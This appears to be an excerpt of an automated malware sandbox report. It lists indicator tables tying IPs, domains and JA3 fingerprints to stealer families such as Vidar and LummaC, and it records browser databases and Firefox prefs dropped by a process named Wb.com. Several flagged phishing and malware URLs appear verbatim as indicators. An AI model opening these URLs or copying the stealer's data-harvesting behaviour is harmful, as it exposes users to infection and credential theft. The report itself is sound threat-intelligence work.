                                                                                                                                                                                                                                                                                  t.meYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  chrome.cloudflare-dns.comSalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.netnTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                                  xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  • 94.245.104.56

                                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                  TELEGRAMRUYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                  tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                  setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                  AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  AMAZON-02USPayout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                  • 52.89.58.139
                                                                                                                                                                                                                                                                                  https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 44.226.126.181
                                                                                                                                                                                                                                                                                  payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 185.166.143.48
                                                                                                                                                                                                                                                                                  https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                                                                  • 13.56.148.153
                                                                                                                                                                                                                                                                                  https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 76.223.125.47
                                                                                                                                                                                                                                                                                  R2-Signed.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                                                                                                  • 18.139.89.40
                                                                                                                                                                                                                                                                                  TsWpfWrp.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                                                                                                  • 52.74.204.186
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 3.5.232.230
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 3.5.232.130
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 3.5.234.55
                                                                                                                                                                                                                                                                                  CLOUDFLARENETUSt8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  • 172.67.199.72
                                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                  MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                                                                                                                  Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                  • 104.18.95.41
                                                                                                                                                                                                                                                                                  http://tax-com.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.67.203.198
                                                                                                                                                                                                                                                                                  https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 104.21.63.207
                                                                                                                                                                                                                                                                                  https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 172.67.69.226
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  • 104.21.95.235
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                  • 104.21.40.196

                                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0epayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 20.198.119.84
                                                                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                  • 188.245.216.205

                                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\623615\Wb.com94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                    94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                      0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                        acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                            9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                              Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                  GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\4EK6XT

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\79R1D2

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\7GLXT0

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10237
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                                                                                      MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                                                                                      SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                                                                                      SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                                                                                      SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\CBAAA1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\D2DTJM79R

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\FK68QQ16F

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\IMGV3W

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):196608
